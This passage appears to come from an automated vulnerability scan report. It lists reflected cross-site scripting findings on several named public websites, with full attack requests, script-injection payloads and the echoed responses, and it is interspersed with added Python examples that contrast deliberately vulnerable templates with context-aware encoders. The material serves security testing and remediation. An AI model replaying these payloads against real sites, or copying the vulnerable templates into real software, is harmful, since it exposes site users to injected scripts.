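The eight mpck and mpvc findings above are two parameters landing in JavaScript string literals, one double-quoted and one single-quoted, with the payloads `"-alert(1)-"` and `';alert(1)//` breaking out of each. As an added Python example that is not part of the scanner output or the vendor's code, the vulnerable template is shown next to a version that emits each value as a JSON-encoded, double-quoted literal with `<`, `>` and `&` escaped as `\uXXXX`; the template text and function names are assumptions.

```python
import json


def vulnerable_script(mpck: str, mpvc: str) -> str:
    """Interpolates the parameters straight into JS string literals, one per quote style."""
    return f'<script>var mpck = "{mpck}"; var mpvc = \'{mpvc}\';</script>'


def js_string_literal(value: str) -> str:
    """A double-quoted JS string literal that cannot terminate itself or the enclosing <script>."""
    lit = json.dumps(value)   # escapes " and \, and (ensure_ascii) the U+2028/U+2029 line terminators
    return lit.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def hardened_script(mpck: str, mpvc: str) -> str:
    return (f"<script>var mpck = {js_string_literal(mpck)}; "
            f"var mpvc = {js_string_literal(mpvc)};</script>")


def round_trips(value: str) -> bool:
    """The literal is valid JSON, so parsing it back must give the original value."""
    return json.loads(js_string_literal(value)) == value


if __name__ == "__main__":
    # Constructed inputs: the scanner's payloads for the two quote styles.
    p1 = '7a0f4"-alert(1)-"e305e7e075d'
    p2 = "c74b4';alert(1)//f093b248a6a"
    print(vulnerable_script(p1, p2))
    print(hardened_script(p1, p2))
```

`json.dumps` alone is not enough in a script block: it leaves `</script>` intact, and the HTML parser ends the script element before the JavaScript parser ever sees the string. Escaping `<` closes that gap. Better still, as the remediation detail says, keep the values out of script altogether (for example in a `data-` attribute read by the script).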
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload dc696<script>alert(1)</script>8652984785e was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=756&ct=COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e&tr=MARKETPLACE&num=5&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
// Error: Unknown old section COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e
1.42. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jlinks.industrybrains.com
Path: /jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a555<script>alert(1)</script>c347c309378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp&3a555<script>alert(1)</script>c347c309378=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 4f4dc<script>alert(1)</script>88b544abd8e was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e&num=5&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
// Error: Site 756 has no section MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e
1.44. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4299d"><script>alert(1)</script>5956202a0bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?4299d"><script>alert(1)</script>5956202a0bb=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.45. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jsc.madisonlogic.com
Path: /jsc
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 551f2<script>alert(1)</script>1434922bee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 716e8"><script>alert(1)</script>6b13a308d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Articles716e8"><script>alert(1)</script>6b13a308d40/456878/ HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:13:56 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP-
...[SNIP]...
<a href="/Articles716e8"><script>alert(1)</script>6b13a308d40/456878/?format=printable" rel="nofollow">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d0e"><script>alert(1)</script>6a13f79386a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/ HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:14:01 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP-
...[SNIP]...
<a href="/Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/?format=printable" rel="nofollow">
...[SNIP]...
1.48. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://lwn.net
Path: /Articles/456878/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de815"><script>alert(1)</script>abe18a1863 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1 HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<a href="/Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1?format=printable" rel="nofollow">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836fe"><script>alert(1)</script>97f2d4406c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico836fe"><script>alert(1)</script>97f2d4406c3 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: lwn.net
Proxy-Connection: Keep-Alive
Response
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:14:10 GMT
Server: Apache
Expires: -1
Content-Length: 4295
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP-
...[SNIP]...
<a href="/favicon.ico836fe"><script>alert(1)</script>97f2d4406c3?format=printable" rel="nofollow">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba08"><script>alert(1)</script>a496f0dd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login7ba08"><script>alert(1)</script>a496f0dd586 HTTP/1.1
Host: lwn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:58 GMT
Server: Apache
Expires: -1
Content-Length: 3762
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP-
...[SNIP]...
<a href="/login7ba08"><script>alert(1)</script>a496f0dd586?format=printable" rel="nofollow">
...[SNIP]...
1.51. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://store.digitalriver.com
Path: /store/kasperus/en_US/buy/productID.224976400
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60c77--><script>alert(1)</script>8fd004d51c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a54d2"><script>alert(1)</script>6a31e0ff9e9 was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9" />
...[SNIP]...
1.53. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6626"><script>alert(1)</script>ccf8d1d548d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?domain=kapersky.com&d6626"><script>alert(1)</script>ccf8d1d548d=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3511f"><script>alert(1)</script>455d50a023f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830d0"-alert(1)-"320fa374e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
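The remediation notes in this report name three reflection contexts that each need a different encoder: a double-quoted attribute value (the canonical link), a double-quoted JavaScript string (the analytics block above), and an HTML comment (the digitalriver finding). The script below is an added example showing one encoder per context beside the vulnerable pattern; it is not the page's or the sites' code. page_vulnerable() is a constructed stand-in modelled on the response snippets on this page, example.test is an assumed origin, and KNOWN_ROUTES is an assumed route allowlist.

```python
"""Context-aware output encoding for the three reflection contexts named in the
remediation notes on this page: a double-quoted attribute value, a double-quoted
JavaScript string, and an HTML comment. Added example, not the page's or the
sites' code; page_vulnerable() is a constructed stand-in modelled on the
response snippets above, and example.test is an assumed origin."""
import html
import json
import re

ORIGIN = "http://example.test"                      # assumed origin
KNOWN_ROUTES = {"/", "/index.html", "/about-us", "/about-us/index.html"}  # assumed

# Payload shapes taken from this page's findings, one per context.
ATTR_PAYLOAD = '"><script>alert(1)</script>'
JS_PAYLOAD = '"-alert(1)-"'
COMMENT_PAYLOAD = '--><script>alert(1)</script>'


def attr(value):
    """Double-quoted attribute value: entity-encode & < > " ' so the delimiting
    quote cannot be closed early and no tag can be opened."""
    return html.escape(value, quote=True)


def js_string(value):
    """JavaScript string literal. JSON handles quotes, backslashes and control
    characters; the extra replacements keep </script>, <!-- and the JS line
    terminators out of the literal. Attribute encoding (&quot;) is the wrong
    tool here: entities are not decoded inside a <script> element, so it
    corrupts the value instead of protecting the page."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        out = out.replace(ch, esc)
    return out


def comment_text(value):
    """HTML comment body: entity-encode, then break every '--' so neither '-->'
    nor '--!>' can appear. The better fix is not to emit user data in comments."""
    return html.escape(value, quote=True).replace("--", "- -")


def canonical_path(request_uri):
    """Canonical URL from an allowlist of routes, not from the raw request URI
    that the findings above show being echoed. Unknown paths fall back to '/'."""
    path = request_uri.split("?", 1)[0].split("#", 1)[0]
    return path if path in KNOWN_ROUTES else "/"


def page_vulnerable(request_uri, param_name):
    """Constructed stand-in reproducing the reflection pattern in the findings:
    raw URI in the href, raw path in a JS string, raw parameter name in a comment."""
    return (f'<link rel="canonical" href="{ORIGIN}{request_uri}" />\n'
            f'<script>s.pageName="{request_uri.split("?", 1)[0]}";</script>\n'
            f'<!-- param: {param_name} -->')


def page_hardened(request_uri, param_name):
    """Same page with each value encoded for the context it is written into."""
    path = request_uri.split("?", 1)[0]
    return (f'<link rel="canonical" href="{attr(ORIGIN + canonical_path(request_uri))}" />\n'
            f'<script>s.pageName={js_string(path)};</script>\n'
            f'<!-- param: {comment_text(param_name)} -->')


SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def script_tag_count(markup):
    """Number of <script open tags; the page legitimately has exactly one."""
    return len(SCRIPT_OPEN.findall(markup))


if __name__ == "__main__":
    for uri, name in (("/index.html" + ATTR_PAYLOAD, "x"),
                      ("/index.html" + JS_PAYLOAD, "x"),
                      ("/", COMMENT_PAYLOAD)):
        print(script_tag_count(page_vulnerable(uri, name)),
              script_tag_count(page_hardened(uri, name)))
```

The canonical-link fix is the one worth noting: the findings on this page exist because the href is assembled from whatever URI the client sent, so even a correctly encoded attribute would still let an attacker choose the canonical URL. Building it from a route allowlist removes the reflection entirely, and attr() then only has to protect against the values that remain.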
1.56. http://usa.kaspersky.com/about-us [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /about-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2d0"><script>alert(1)</script>a2fb0f73f17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4604"><script>alert(1)</script>49eb04b0130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcef7"-alert(1)-"ca2b6d35942 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43d62"-alert(1)-"396773fa193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93f3f"><script>alert(1)</script>8c4eaed748a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/contact-us93f3f"><script>alert(1)</script>8c4eaed748a" />
...[SNIP]...
1.61. http://usa.kaspersky.com/about-us/contact-us [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /about-us/contact-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55f0"><script>alert(1)</script>c4fbba611eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb34"-alert(1)-"f6e6b16c6e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-usfeb34"-alert(1)-"f6e6b16c6e2/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a50"><script>alert(1)</script>4af2ba5c2d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about-us29a50"><script>alert(1)</script>4af2ba5c2d8/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb91"><script>alert(1)</script>26b2aedd759 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about-us/index.htmlcfb91"><script>alert(1)</script>26b2aedd759 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afee"-alert(1)-"30c582827e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-us/index.html1afee"-alert(1)-"30c582827e1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...
1.66. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /about-us/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d145"><script>alert(1)</script>2fdc71b9919 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/index.html?4d145"><script>alert(1)</script>2fdc71b9919=1" />
...[SNIP]...
1.67. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /about-us/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6a5e"-alert(1)-"5bd0805b351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about-us/index.html?d6a5e"-alert(1)-"5bd0805b351=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78970"-alert(1)-"54a60fcb75b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.html78970"-alert(1)-"54a60fcb75b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3593"><script>alert(1)</script>31e1b81b14a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.htmlf3593"><script>alert(1)</script>31e1b81b14a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.htmlf3593"><script>alert(1)</script>31e1b81b14a" />
...[SNIP]...
1.70. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb7a"><script>alert(1)</script>b8beb20b2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
